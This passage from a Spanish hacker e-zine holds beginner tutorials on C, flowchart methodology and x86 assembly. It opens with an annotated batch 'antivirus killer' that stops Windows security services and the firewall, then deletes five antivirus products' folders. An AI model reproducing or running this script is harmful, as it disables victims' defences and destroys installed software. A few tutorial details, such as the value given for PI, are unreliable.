comandos en el Batch (si quisiéramos volver a ejecutar los comandos que están después de inicio se podría poner el comando Goto Inicio) y el :bucle seria para poder identificar la parte donde se inicia el bucle y para desde dentro del bucle poder volver a ejecutar el comando que esta en el bucle.

cd “%programfiles%” Con la variable %programfiles% vamos a la ruta
C:\Archivos de Programa o a la ruta en donde estén lo archivos de programas.

cd “Grisoft”
La carpeta en donde esta el AVG Free Antivirus (luego con el comando DEL borramos todo).

del /Q /F /S *.*>nul
Para borrar todos los archivos sin pedir confirmación, ni Mostar los archivos que se han borrado.

Start iexplore www.google.com
Es el comando para abrir la aplicación del Internet Explorer en la página Web de google.

Goto bucle
Para repetir los comandos desde donde esta la línea :bucle y luego llegaria a este comando y se repetiría todo de vuelta y así seria infinito. A V-Killer (Mata AntiVirus) Crearemos un Batch que pueda matar 5 antivirus, desactivar el Firewall de Windows y apagar el sistema de seguridad, básicamente usando los comandos DEL y NET. Código: @echo off Net stop "Centro de seguridad" net stop "Firewall de windows/Conexion compartida a internet (ICS)" cd “%programfiles%” cd “Grisoft” del /Q /F /S *.*>nul cd .. cd “Norton Antivirus”

cd ..
Para subir de directorio (ir a la carpeta Archivos de Programa).

cd “Norton Antivirus”
La carpeta en donde esta el Norton Antivirus (luego con el comando DEL borramos todo).

cd “Kapersky Lab”
La carpeta en donde esta el Kapersky Antivirus (luego con el comando DEL borramos todo).

cd “McAfee.com”
La carpeta en donde esta el MC Afee System Works (luego con el comando DEL borramos todo).

cd “Nod32 Antivirus System”
La carpeta en donde esta el NOD32 Antivirus (luego con el comando DEL borramos todo).

CUH e-zine 2ª edicion

Introducción al lenguaje C

Introduccion al lenguaje C

By NI0

Hola a todos los que leen la revista CUH e-zine de el-hacker, yo soy Ni0 y les voy a enseñar a programar en lenguaje C, un lenguaje potente, en el que podemos mezclar programación batch, assembler y C todo en un mismo programa, también es el lenguaje con el que se programó el Linux, pero la desventaja del C es que es un poco complicado crear las ventanas de Windows, ya veremos como, pero es mucho mas difícil que en visual Basic. Este tutorial va a ser la primera parte, va a ser una introducción al lenguaje C. Quiero agradecer a alesteir por darme esta oportunidad, gracias alesteir.

Primero hay que explicar unas cosas antes de enseñar el lenguaje, empecemos: Un programa, se puede crear con solo tener una PC (no hay que tener la mejor, miren, yo uso una Pentium 2 con 128 MB de ram y programo sin ningún problema) y es necesario tener un editor de texto plano, o sea, que no le ponga colores ni nada de eso a lo que escribimos (como el bloc de notas, pero NO el Word), aunque creo que es mejor que nos descarguemos un editor de lenguaje C (por el ejemplo el DEV-CPP que aparte de editar nos , compila el programa, ya vamos a ver que es eso),

con el editor, vamos a ver el código fuente (el código fuente es el programa escrito en un lenguaje, por ejemplo el C, este código fuente solo lo entiende el humano, para que la PC lo pueda entender, y por lo tanto, ejecutar el programa, tenemos que compilar el código fuente) con colores que van a caracterizar algunas cosas del código fuente para identificarlas mas fácil, y nos ayuda a la hora de programar, en resumen, nos facilita el entendimiento del código fuente (aunque yo antes dije que no usemos programas como el Word que le podemos poner colores a las letras, etc., esto es distinto, el Word GUARDA en el archivo que letras esta con que color, etc., pero el editor del lenguaje C, o cualquier lenguaje, solo muestra en color, pero NO guarda esa información, ya veremos porque es importante que solo guarde el código fuente sin ningún agregado). Para que la PC pueda entender el programa y ejecutarlo, tenemos que compilar el código fuente, para eso usamos un compilador (por ejemplo el que viene con el DEV-CPP que es el que , yo uso y me gusta mucho), el compilador lo que hace es pasar el código fuente en lenguaje C al lenguaje maquina, se llama así porque lo entiende la maquina :P lo que hace el compilador es leer el código , fuente, interpretarlo y pasarlo al lenguaje maquina (en resumen hace eso), si nosotros usamos el Word, cuando compilemos, el compilador va a leer el código fuente y puede que lea (es un ejemplo, no digo que sea exactamente así, solo que puede que lo lea) “textcolor=RED”, y el compilador lo va a enteder bien (o sea, no va a dar error si se dan las condiciones) y el programa va a hacer cualquier cosa, o bien, el compilador va a dar error si no entiende, (aunque no le cambien la letra ni el color ni nada, el Word escribe varias cosas de mas, como la configuración de la hoja, etc., así que no piensen que si le dejan el color en negro van a poder compilar el código fuente creado en Word). Para que tengan noción de lo que es el lenguaje maquina, hagan lo siguiente: abran el bloc de notas, vayan a alguna carpeta que tengan un archivo ejecutable (no el acceso directo, sino el ejecutable, cualquiera que tenga extensión *.exe o *.com) y arrastren el icono del ejecutable al bloc de notas que teníamos abierto, lo que ven (si lo hicieron bien) es el lenguaje maquina, lo único que se entiende, o se puede deducir, es el texto "this program cannot be run in DOS mode",(el texto solo esta en las aplicaciones de Windows ,que solo se pueden ejecutar en Windows,

CUH e-zine 2ª edicion
las que usemos para DOS no van a tener esto). Creo que con eso les va a servir por ahora para entender (el proceso de compilación) la programación, mas adelante hay que aclarar mas cosas, pero por ahora es suficiente.

Introducción al lenguaje C

Cuando la cabecera ya viene con el compilador, ponemos los <>, entonces el compilador va a buscar el archivo en la carpeta include\, si estuviese en include\sys, lo que hay que hacer es: #include <sys\timeb.h> Las comillas (“”) se usan cuando la librería esta en otro directorio que no sea “(directorio del compilador)\include” (aunque puede variar, pero por lo general siempre están may), entonces tenemos que poner la ruta de la cabecera, pero si esta en el mismo directorio que el código fuente, solo basta con poner el archivo. main() es la función principal, todo lo que este entre los corchetes ({}) es lo que contiene la función main (no hay que agregar ninguna cabecera para esta función, y al ejecutarse el programa se va a ejecutar todo lo que contenga la función main. printf(“hola mundo”) es una función que imprime en pantalla, esta función esta declarada en la cabecera stdio.h, o sea, si no agregamos la cabecera stdio.h (poniendo la línea #include <stdio.h>) la función no estaría declarada por lo que el compilador no sabría que hace esa función, despues de nombrar una función (por ejemplo printf) hay que poner los paréntesis y dentro de los paréntesis ponemos los argumentos, que son como “opciones” que le damos a la función, estos argumentos pueden ser variables (ya veremos que son), números, caracteres o cadena de caracteres, dependiendo de que argumento pongamos, es lo que hace la función, si la función no necesita argumentos, solo tenemos que poner función(); sin nada entre los paréntesis, y despues de cada función hay que poner punto y coma “;”, y si la función necesita mas de un argumentos (ya veremos que podemos agregarle mas argumentos a printf, pero por ahora supónganse que necesita solo uno, y el ejemplo que sigue no es correcto, es solo un ejemplo aplicado para todas las funciones), estos van separados por comas "," por ejemplo si la función printf necesitara 2 argumentos, uno de un titulo y otro de un texto, la función seria: printf("el titulo", "el texto"); La función prinf imprime o muestra en pantalla un texto (o también un solo caracter), para indicarle que tiene que imprimir hay que poner la cadena (llamamos “cadena” al conjunto de caracteres, o sea el texto) o el caracter, cuando en el lenguaje C queremos indicarle al programa que lo que escribimos es una cadena, hay que ponerla entre comillas (“”), sino, el programa lo va a pensar que es una variable (en el próximo tutorial hablaremos de ello), y a su vez el compilador va a dar error porque no esta declarada esa variable (ya hablaremos de eso); cuando le queremos indicar que es un caracter, podemos ponerlo entre comillas o entre apostrofes (‘’). Ahora que ya tenemos explicado un poco de sintaxis y que hace la función printf, vamos a

Empecemos pues con el lenguaje C, abran el DEVCPP (si utilizan otro S.O. pregúntenle a mi amigo GOOGLE compiladores c, seguro que hay alguno como el DEV-CPP pero para linux), vallan a tools>environment options->interface y en lenguaje: seleccionen español, despues vayan a herramientas>opciones de entorno y destilden la opción “C++ por defecto en nuevo proyecto” (con esto le decimos que el lenguaje por defecto va a ser el C), ahora vayan al menú archivo->nuevo->código fuente; en la ventana que se acaba de crear podemos empezar a programar, empecemos por programar el típico: “hola mundo” con salida en la pantalla, escriban lo siguiente (todo lo que escriba en azul es el código, pero a ustedes les va a poner el color por defecto que tiene el dev-cpp y algunas cosas, como la primera línea, van a cambiar de color): #include <stdio.h> main() { printf(“hola mundo”); } Grabemos el código haciendo click en el iconito del diskete (eligen donde guardar el nuevo programa y lo demás es fácil), les hice guardar el código para que sepan guardarlo, pero igual, antes de compilar un código nuevo, hay que guardarlo. Vamos a aclarar que es lo que escribimos: Todo lo que este despues de un #, le informa al compilador que haga algo, en este caso (#include <...>) le indica al compilador que agregue la cabecera (librería) stdio.h, una archivo de cabecera contiene información sobre las funciones y otra información que ya veremos, dependiendo de que funciones utilicemos, todo de depende de la cabecera que agreguemos, si queremos agregar mas archivos hay que ponerlo así: #include <stdio.h> #include <stdlib.h> ... O sea, en una nueva línea, y como podrán ver, la cabecera esta dentro de los “<>”, pero a veces se pone así: #include “milibreria.h”

CUH e-zine 2ª edicion
compilar el programa, hay 4 iconos que nos ayudan a esto, están a la izquierda, uno es como si fuera la banderita del Windows (este compila) , al lado una ventana (este ejecuta el programa si es que ya esta compilado), otro las 2 cosas (compila y luego ejecuta el programa), y el otro una ventana gris (regenera por completo el programa, por ahora es lo mismo que compilar, pero cuando tengamos programas mas grandes con archivos de recuso, espero poder dar un tutorial de eso, es cuando este icono sirve), vamos a usar el que compila y luego ejecuta (usen el que quieran, pero con este con solo apretar una vez ya les compila e inmediatamente lo ejecuta), cuando termino de compilar va a ejecutar el programa..., seguramente se les abrió y se les cerro el programa, esta bien, lo que pasa es que el Windows ejecuto el programa y como inmediatamente despues de escribir en pantalla termina, lo termino, para que no se termine inmediatamente, vamos a usar la función getchar, no usa argumentos, así que solo hay que poner getchar(); esta función lo que hace es esperar a que el usuario presione la tecla enter, así que vamos a colocarla despues de printf(“hola mundo”); así despues de imprimir va a esperar a que presionemos enter antes de finalizar el programa, entonces el código fuente nos queda así: #include <stdio.h> main() { printf(“hola mundo”); getchar(); } compilamos y ejecutamos, como no estamos usando las API (que son las funciones que nos da el Windows, con algunas de esas funciones creamos las ventanitas de Windows, espero poder escribir un tutorial de eso) el programa se nos ve en esa ventanita negra, este tipo de programas se llaman aplicaciones de consola, presionen enter y el programa tendría que terminar, si es así, han creado su primer programa (en realidad el segundo, porque el que solo ponía hola mundo y se cerraba también era un programa) FELICITACIONES! Ahora, jueguen con lo que saben, pongan otros textos, pongan 2 funciones getchar, una al principio y otra al final, no se, jueguen. La forma en la que programe, con los espacios y todo eso, no tiene que ser exactamente así, el compilador ignora los espacios y cuando ponemos una nueva línea, excepto todo lo que este después del #, cuando terminemos de usarlos, tenemos que poner nueva línea, fíjense que todo lo que escriben después del # se ve de otro color (si usan el dev-cpp como les recomendé), si ustedes ponen todo el programa en esa línea, se va a ver todo de ese color, o sea, el compilador va a leer todo eso como si

Introducción al lenguaje C

quisiéramos agregar toda esa línea como cabecera; basándonos en lo anteriormente dicho, nuestro programa puede estar escrito así: #include <stdio.h> main(){printf("hola mundo");getchar();} y nos funcionaria perfectamente, pero tienen que mantener la sintaxis, cerrar y abrir los paréntesis y los corchetes y los ";" despues de cada función. también podríamos hacerla así: #include <stdio.h> main() { printf( "hola mundo" ); getchar(); } acuérdense que el compilador se "saltea" los espacios, etc., excepto lo que esta despues del # (sea lo que sea), pero se recomienda darle cierto formato al código fuente para poder entenderlo mejor, por ejemplo cada función va en una línea, cuando se abre un corchete (cuando empieza una función, por ejemplo main, o cuando se usan controladores de flujo, que ya veremos que son) se va a una nueva línea y se deja 4 espacios. Las cadenas se pueden dividir, por ejemplo podemos hacer printf("hola " "mundo"); y daría el mismo resultado que printf("hola mundo"), con hacer eso, NO pasamos a una nueva línea, mas adelante veremos como se hace (en este mismo tutorial), lo que no podemos hacer Supongamos que estamos programando un programa muy largo y queremos agregar comentarios, para acordarnos de algo, o queremos que se entienda que hace el programa, o para lo que quieran, tienen que poner los comentarios entre "/*" y "*/" (sin las comillas), todo lo que este dentro de /* */ va a pasarse por alto por el compilador; por ejemplo en el programa hola mundo podríamos hacer esto: #include <stdio.h> /*agregamos la cabecera stdio.h*/ main() /*empieza la función main*/ { printf("hola mundo"); /*muestra hola mundo en pantalla*/ getchar(); /*espera que se apriete la tecla enter*/ } /*termina el programa*/ quizás vieron o escucharon de usar "//" (sin comillas) para los comentarios, eso se usa en C++, aunque el dev-cpp lo toma como comentarios (ya que compila C y C++, o sea, C/C++), si quieren usar los //, el

CUH e-zine 2ª edicion
compilador toma por comentario toda la línea, o sea, en printf("hola mundo"); /*muestra hola mundo en pantalla*/ tendríamos que poner printf("hola mundo"); //muestra hola mundo en pantalla pero si el comentario fuera: printf("hola mundo"); /*muestra hola mundo en pantalla*/ (recuerden que todo lo que este entre /**/ va a ser tomado como comentario) tendríamos que poner: printf("hola mundo");//muestra //hola mundo //en pantalla

Introducción al lenguaje C

\90) \hxx (el caracter va a ser el numero HEXAGESIMAL que reemplace a las X, ejemplo \hA9) \\ Barra invertida (caracter "\", si nosotros quisiéramos escribir en pantalla \nosotros, saldría nueva línea y despues osotros, entonces tenemos que poner \\nosotros y va a salir en pantalla \nosotros) \" (caracter comilla ("), si queremos poner una comilla en un texto, si no usamos \" el compilador lo toma como fin o inicio de una cadena, por ejemplo si quisiéramos poner printf(""hola mundo""); daría error, porque la cadena iniciaría y finalizaría al principio, lo correcto es hacer printf("\"hola mundo\"");) estos caracteres reemplazan a los que corresponden, si nosotros queremos que en pantalla aparezca: hola mundo NO hay que hacer: printf("hola"); printf("mundo"); porque no se le indico al programa que pase a la nueva línea, lo que hay que hacer es poner el caracter de nueva línea en donde queramos que pase a la nueva línea, en nuestro caso seria: printf("hola\nmundo");

En C existen los "caracteres de escape" que aunque se escriban 2 caracteres o mas para identificar a ese tipo especial de caracter, en realidad es uno solo; estos caracteres son: \″ Comilla doble \0 Carácter nulo \a Alarma \v Tabulación vertical \r (Carácter Enter) Retorno de carro \n (caracter de nueva línea) Nueva línea \t (caracter de tabulador) Tabulación horizontal \b (retrocede un caracter) \xxx (el caracter va a ser el numero que reemplace a las X, tiene que ser un numero del 0 al 255, ejemplo \90) \hxx (el caracter va a ser el numero HEXAGESIMAL que reemplace a las X, ejemplo \hA9) \\ (caracter "\", si nosotros quisiéramos escribir en pantalla \nosotros, saldría nueva línea y despues osotros, entonces tenemos que poner \\nosotros y va a salir en pantalla \nosotros) \' Comilla simple \" Comilla doble (caracter comilla ("), si queremos poner una comilla en un texto, si no usamos \" el compilador lo toma como fin o inicio de una cadena, por ejemplo si quisiéramos poner printf(""hola mundo""); daría error, porque la cadena iniciaría y finalizaría al principio, lo correcto es hacer printf("\"hola mundo\"");)

Este fue la introducción al C, espero haber sido claro y espero poder hacer la segunda parte y así sucesivamente hasta explicarles todo lo que se de programación en C. Resumiendo lo que se vio: • Algunas cosas antes de programar. • Nuestro primer programa. • Funciones printf y getchar • Sintaxis • Comentarios • Caracteres de escape

empezar

a

\xxx (el caracter va a ser el numero que reemplace a las X, tiene que ser un numero del 0 al 255, ejemplo

By NIO

CUH e-zine 2ª edicion

Metodología de la Programación

Metodología de Programación

By Aleksteir

Bueno amigos del foro de El-Hacker.com, o sea la Comunidad Underground Hispana CUH, es un honor poder participar de nuevo en el staff de colaboradores y organizadores, por mi parte, espero que a todo aquellos que lean la revista, les sirva de algo y que aporte un plus a los conocimientos ya adquiridos hasta ahora, por el momento vamos con lo básico y lo suave, a medida que pasen los números, yo se que el grado de aprendizaje brindado por los articulistas, será mucho mas elevado, bueno no es mas y a lo que vinimos a aprender a programar. Como veíamos en el articulo pasado lo que era un algoritmo (Conjunto de operaciones (sentencias y proposiciones) y procedimientos (Toma de decisiones y procesos) que deben seguirse para la resolución de un problema), también vinos algo breve sobre el Pseudocódigo, los diagramas de flujo o flujogramas, aprendimos sobre datos y su clasificación; los operadores y la jerarquía que se debe tener en cuenta a la hora de realizar operaciones; los identificadores (constantes, variables, datos, procedimientos, funciones), además de un glosario con los términos que se usan a la hora de desarrollar un programa, en este articulo empiezo advirtiendo sobre las cosas que no se deben hacer o errores que se podrían llegar a cometer a la hora de elaborar un Diagrama de flujo, errores como pueden ser: hacer los conectores diagonales Ver figuras 1 (forma incorrecta) y 2 (forma correcta) o entrecruzar las líneas conectoras Ver figura 3, tampoco se deben añadir módulos al flujo del diagrama sin ser previamente llamados Ver Figura 4.

Figura 2

Figura 3

Figura 4

Normas para el diseño de diagramas de flujo
Figura 1 1. Un diagrama debe ilustrar gráficamente los procesos que se deben seguir para la

CUH e-zine 2ª edicion
resolución de un problema. Por eso debemos saber colocar un signo para cada proceso, es el diagrama el que hace mas fácil desarrollar un programa, en algún tipo de lenguaje. Las líneas que indican la dirección del flujo del diagrama deben de ser rectas, horizontales o verticales. Todo diagrama tiene un principio y un fin. Todos los símbolos de un diagrama deber de estar interconectados. El diagrama debe ser construido de arriba hacia abajo (top-down) y de derecha a izquierda (right- left). Se aconseja que en un proceso complejo se debe acompañar un comentario acerca del proceso. El tipo de notación dentro de un diagrama, nunca debe ceñirse a un lenguaje de programación en especifico, debe ser independiente.

Metodología de la Programación

2.

3. 4. 5.

Como vimos en el articulo anterior, la secuenciación es una estructura de control que permite al PC ejecutar una acción, luego la próxima, y así sucesivamente, hasta encontrar el final del archivo (EOF). Las acciones que por lo general realiza un programa consisten en operaciones elementales como pueden ser: Declarar las variables (privadas o públicas), lectura de los datos, toma de decisiones, realizar cálculos o comparación de expresiones. Teniendo en cuenta lo visto hasta ahora, procederemos a realizar el diseño de algunos algoritmos y sus respectivos diagramas de flujo. En el ejemplo 1 veremos un algoritmo que permite leer un número en radianes e imprime su equivalencia en radianes Algoritmo: Convierte Radianes a grados y viceversa. Inicio 1. Declaración de variables: PI=3.145926536: real (flotante) rad, grad, numrad, numgrad: real (flotante) 2. Leer rad,grad 3. numgrad= rad*(180/PI) 4. numrad= grad*(PI/180) 5. Imprimir numgrad,numrad 6. Fin

6.

7.

8. No fraccionar el diagrama con el uso excesivo de conectores. 9. Solo debe llegar una sola línea de flujo a un símbolo. Pero pueden llegar muchas líneas de flujo a otras líneas. 10. Las líneas de flujo deben de entrar a un símbolo por la parte superior y/o izquierda y salir de él por la parte inferior y/o derecha. 11. Evitar que el diagrama sobrepase una página; de no ser asi, enumerar y emplear los conectores correspondientes. 12. Usar lógica positiva, es decir, realizar procesos cuando es verdadera la condición y expresar las condiciones de manera clara.

Inicio

rad, grad

13. Comentar al margen únicamente cuando sea
necesario.

Diseño de Algoritmos
Existe una gran variedad de problemas que demandan de un análisis profundo y de un pensamiento flexible y estructurado para encontrar la solución. Para ello, debemos conocer las técnicas y las herramientas, que nos permitan desarrollar la construcción de algoritmos eficientes, en la siguiente figura se pueden observar las distintas etapas, que se siguen para la correcta solución de un problema.

numgrad = rad*(180/PI)

numrad= grad*(PI/180)

numgrad numrad

Fin

Problema

En el ejemplo 2 veremos un algoritmo que permite calcular el promedio de un estudiante, se pedirá la matricula del alumno y cuatro calificaciones de los exámenes, se imprimirá la matricula del alumno y el promedio
Verificación del Algoritmo

Análisis Profundo del sistema

Construcción del Algoritmo

Algoritmo: Calcular promedio Alumno 1. Inicio

CUH e-zine 2ª edicion
2. Declaración de variables matalu:entero ca1, cal2, cal3, cal4, calfinal: real (flotante) 3. Leer cal1, cal2, cal3, cal4 4. calfinal = (cal1+cal2+cal3+cal4)/4 5. Imprimir matalu, calfin 6. Fin

Metodología de la Programación

Algoritmo: Imprimir números hasta 100 1. Inicio 2. Declaración de variables I, (entero) 3. Estructura condicional I<100 I=I+1 Imprimir I 4. Fin Inicio

Inicio

matalu, cal1, cal2, cal2, cal3, calc4

I no

calfinal = (cal1+cal2+cal3+cal4)/4

I<100 si

Fin

matalu calfinal

Fin

I=I+1

I

En el ejemplo 3 veremos un algoritmo que permite multiplicar dos números: Algoritmo: Multiplicar dos numeros 1. Inicio 2. Declaración de variables num1, num2, entero 3. Leer num1, num2 4. multi = num1*num2 5. Imprimir multi 6. Fin Inicio

num1, num2

multi = num1*num2

multi

Ejemplo de un diagrama un poco mas complejo Fin Por el momento es todo, seguimos con cositas básicas en el próximo número del CUH e-zine, By Aleksteir

CUH e-zine 2ª edicion

Introducción al ASM

Introduccion al ASM
TASM y el MASM.

By The Shadow

Breve introducción al Microprocesador:

Introducción al ASM _ by “The Shadow” *Nota: *1 quiere decir que dicha línea es solo parte de este tutorial, no se usa a la hora de programar. “Pe.:” se refiere a un ejemplo explicativo. Pe.: ~ Por ejemplo ~: Se refiere al significado o a una equivalencia. Prologo “Vistos a muy bajo nivel, los microprocesadores procesan exclusivamente señales electrónicas binarias. Dar una instrucción a un microprocesador supone en realidad enviar series de unos y ceros espaciadas en el tiempo de una forma determinada. Esta secuencia de señales se denomina código máquina. El código representa normalmente datos y números e instrucciones para manipularlos. Un modo más fácil de comprender el código máquina es dando a cada instrucción un mnemónico, como por ejemplo CMP, ADD o JMP. Esta abstracción da como resultado el ensamblador, un lenguaje de muy bajo nivel que es específico de cada microprocesador. El microprocesador es el chip que se encarga de controlar, manejar y procesar los datos de un ordenador. Este lleva a cabo una gran variedad de cálculos, comparaciones numéricas y transferencias de datos como respuesta a las peticiones de los programas que están siendo ejecutados en memoria. Para cuestiones de operaciones de cálculo y almacenamiento de datos, el procesador cuenta con una serie de REGISTROS que actúan como una variable, como un lugar de almacenamiento dentro del procesador en si, esto hace que la información almacenada en estos registros sea mas accesible que cualquier otra que tenga que pasar por algún bus de datos (también llamados “sendas electrónicas”; transfieren datos por los dispositivos de entrada y salida E/S). Registros de mayor relevancia: ------------------------------------------------de Datos AX (Acumulator Register) ~ Acumulador BX (Base Index Register) ~ Indice Base CX (Counter Register) ~ Contador DX (Data Register) ~ Dato Uso: para cálculo y almacenamiento general de datos. Observaciones: Cada uno de estos registros tiene una longitud de 16 bits, que por cuestiones de conveniencia puede dividirse en dos registros de 8 bits. Pe.: El registro BX se puede dividir en BH (H ~ High ~

Los lenguajes de bajo nivel permiten crear programas muy rápidos, pero que son a menudo difíciles de aprender. Más importante es el hecho de que los programas escritos en un bajo nivel son prácticamente específicos para cada procesador. Si se quiere ejecutar el programa en otra máquina con otra tecnología, será necesario reescribir el programa desde el principio.”
Ensamblador, en si, es el programa que se encarga, básicamente, de convertir el código de fuente que escribimos, en números, con el objeto de que la maquina lo entienda. Aunque en realidad, lo convierte en un código objeto, que es una herramienta que se creo para poder unir varias rutinas hechas en diferentes lenguajes. A lo que crea el ejecutable se le llama “Linker”. *Algunos de los ensambladores mas usados son el

CUH e-zine 2ª edicion
Alto) que se refiere al los 8 bits mas significativos (mas a la izquierda) y BL (L ~ Low ~ Bajo) que se refiere al los 8 bits menos significativos (mas a la derecha). Así seria: BX = BH + BL ~ 046Ch = 04h + 6Ch

Introducción al ASM

------------------------------------------------de Índice SI (Source Index) ~ Índice de Origen DI (Destination Index) ~ Índice de Destino BP (Base Pointer) ~ Puntero Base SP (Stack Pointer) ~ Puntero de Pila Uso: para direccionamientos de memoria.

------------------------------------------------de Instrucción: IP (Instruction Pointer) ~ Puntero de Instrucción Función: indica la dirección de la siguiente instrucción a ejecutar. Su valor cambia conforme a la ejecución de instrucción actual. ------------------------------------------------de Segmentos: CS (Current Segment) ~ Segmento Actual (referido al programa cargado en la memoria) DS (Data Segment) ~ Segmento de Datos ES (Extra Segment) ~ Segmento Extra SS (Snack Segment) ~ Segmento de Pila Funcion: apuntan a un segmento (64ks de memoria). ------------------------------------------------Flags: CF (Carry Flag) PF (Parity Flag) AF (Auxiliary Flag) ZF (Zero Flag) SF (Sing Flag) TF (Trap Flag) IF (Interrupt Flag) DF (Direction Flag) OF (Overflow Flag) ~ Bandera de por acarreo ~ Bandera de por paridad ~ Bandera Auxiliar ~ Bandera por cero ~ Bandera de signo ~ Bandera de paso simple ~ Bandera de interrupción ~ Bandera de dirección ~ Bandera de desbordamiento

una 'h' (04h). Los números hexadecimales (con base 16), pueden estar formados por los dígitos: 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, A, B, C, D, E y F con valores de 0d a 15d (0h - Fh). , --Convertir hexadecimal a decimal: Para convertir un numero de hexadecimal a decimal, se multiplica el valor del primer digito por 16 elevado a la potencia 0, luego a eso se le suma el resultado de multiplicar el segundo digito de derecha a izquierda por 16 elevado a la potencia 1, y así sucesivamente con cada digito del numero a la potencia anterior mas uno. Pe.: 0E3Ah = (10) + (3*16) + (14*162) + (0*163) = 10 + 48 + 3584 + 0 = 3642d. *Si un número comienza por una letra, a este se le agrega un 0. Pe.: A32h = 0A32h -Direccionamientos y posiciones de memoria: Una posición de memoria se refiere a un byte específico dentro de esta, en ensamblador, estas posiciones se determinan mediante los registros (Pe. DS:SI) o direcciones de memoria especificas (Pe.: 0E1C:0010). Una direccion de memoria en ensamblador esta especificada un SEGMENT, seguido de “:” y un OFFSET. (Pe.: DS->(segment):->(”:”)SI->(offset) ~ DS:SI.) Supongamos que el registro DS tiene un valor de 0043h, y el SI un valor de 012Ah. Para saber a que byte especifico apunta la dirección DS:SI, se debe realizar la siguiente suma DS ~ 0043 SI ~ + 012A _______________ DS:SI ~ 0055Ah -Uso de TASM para crear un ejecutable: --Estructura del código fuente en el TASM: Dentro del código se pueden añadir comentarios usando “;” Pe.: ---------------------Inicio del código (comentario) *1 ; Esto es un comentario dentro del código ---------------------Fin *1 ---------------------Código explicativo de la estructura de un código fuente usando TASM. *1 .MODEL SMALL; Especifica el modelo de memoria. .STACK 100H; Especifica el area de pila (stack) .DATA; Aquí es para definir los datos .CODE; Indica que desde aquí empieza el código INICIO: ; Esta es una etiqueta, es un nombre que se le da a una posición para luego poder ; referirnos a ella por su nombre. ; Aquí entonces rellenamos con lo que queramos. END INICIO; Aquí se le dice al ensamblador que el código termina. El nombre que va después ; del END debe ser el mismo de la etiqueta de inicio del código ---------------------Fin *1 *Nota: *1 quiere decir que dicha línea es solo parte de este tutorial, no se usa a la hora de programar.

Son registros donde se guardan los resultados de una comparación o de una operación matemática realizada. Estos registros solo almacenan los resultados de estado. -Sistema de numeración: En ASM, para identificar un numero decimal se le agrega una 'd' al final del numero (04=04d), aunque mayormente, si no se le agrega la “d” a un numero, el programa ensamblador lo identifica como decimal; mientras que en hexadecimal se le agrega

CUH e-zine 2ª edicion

Introducción al ASM

Contiene un solo parámetro. Su función es saltar a otra posición de memoria o más bien dentro del código fuente se especifica el nombre de una etiqueta. --Algunas ordenes del ASM: Orden parámetro 2do parámetro 1er --La orden JE ~ Jump If Equal ~ Salta si es Igual ((Pe.: je etiqueta1)) Contiene un solo parámetro. Este es una orden condicional, depende de una comparación o del estado que de una flag. Su función es saltar a la etiqueta especificada, solo si la condición anterior daba un resultado que decía que los dos valores que se compararon son iguales. --La orden JNE ~ Jump If Not Equal ~ Salta si no es Igual ((Pe.: jne etiqueta1)) Contiene un solo parámetro. Este es una orden condicional, depende de una comparación o del estado que de una flag. Su función es saltar a la etiqueta especificada, solo si la condición anterior daba un resultado que decía que los dos valores que se compararon no son iguales. --La orden JZ ~ Jump If Zero ~ Salta si es cero ((Pe.: jz etiqueta1)) Contiene un solo parámetro. Este es una orden condicional, depende del estado que de una flag. Su función es saltar a la etiqueta especificada, solo si el registro correspondiente da un resultado igual a cero. --La orden INT ~ Interruption ~ Interrupción ((Pe1.: int 21h)) Contiene un solo parámetro*2. Su función es ejecutar la interrupción especificada. *2 Aunque esta orden contenga un solo parámetro, utiliza los valores almacenados en algunos registros específicos para cada interrupción. Cada interrupción tiene servicios diferentes. Estos servicios llevan como parámetros los valores que se le asignan anteriormente a algunos registros. Pe2.: ----------------------------------Ejemplo del uso del servicio 3DH de la INT 21H (Crear un archivo)*1 … ;Parámetros: ;DS:DX = Apuntador al nombre del archivo ASCIIZ ;AL = Modo de acceso ; AL = 0 ~ lectura ; AL = 1 ~ escritura ; AL = 2 ~ lectura/escritura ;Devuelve CF y AX para el manejo de errores; ;Éxito ~ CF=0 ; AX = descriptor o handle. ;Error ~ CF=1 ; AX = código de error. MOV DX,OFFSET ARCHIVO ;Apuntamos al offset de la “variable” ARCHIVO almacenandolo ;en DX MOV AH,3DH ;Almacenamos el valor 3Dh en AH MOV AL,2 ;Especificamos AL con el valor 2

--La orden MOV ~ Move ~ Mover ((Pe1.: mov ax,04h)) Contiene dos parámetros. Su función es copiar el contenido del segundo parámetro al primero. Los parámetros pueden ser registros, valores específicos y posiciones de memoria. Existen excepciones en cuanto al tipo de parámetros que se utilicen. Por ejemplo, NO se le puede asignar un valor directamente a un registro de segmento, para hacer esto, primero se debe pasar el valor a transferir a un registro (que no sea de segmento, ya que no se puede transferir el contenido de un registro de segmento a otro de segmento), y luego asignar el valor de este registro al de segmento. ((Pe2.: MOV DS,0F6Ch esto NO es una orden valida. Para eso, se debe: MOV DX,0F6Ch ;mover el valor al registro DX (DX es un ejemplo, podía haber sido cualquier ;otro (que no sea de segmento!)) MOV DS,DX ;mover el contenido de DX al DS )) Otra excepción es que, NO se puede transferir el contenido de una posición de memoria a otra posición de memoria directamente, para hacerlo debe introducirse el contenido de una posición a un registro y luego entonces copiar el contenido de dicho registro a la otra posición de memoria. ((Pe3.: MOV DS:[3000],ES:[1020] esto NO es una orden valida. Para hacer esto, debemos: MOV AX,ES:[1020] ;Aquí copiamos el contenido de ES:[1020] en AX MOV DS:[3000],AX ;Luego lo movemos a DS:[3000])) --La orden ADD ~ Sumar ((Pe.: add al,02h)) Contiene dos parámetros. Su función es sumar el valor del 2do parámetro al 1er parámetro. (( add al,02h ~ al+=02h ~ al=al+02h )). --La orden INC ~ Increment ~ Incrementar ((Pe.: inc di)) Contiene un solo parámetro. Su función es incrementar el valor del parámetro en 1. (( inc di ~ di++ ~ di = di + 1 )) --La orden CMP ~ Comparar ((Pe.: cmp ax,02Ah)) Contiene dos parámetros. Su función es comparar el valor de los dos parámetros. --La orden JMP ~ Jump ~ Saltar ((Pe.: jmp etiqueta1))

CUH e-zine 2ª edicion
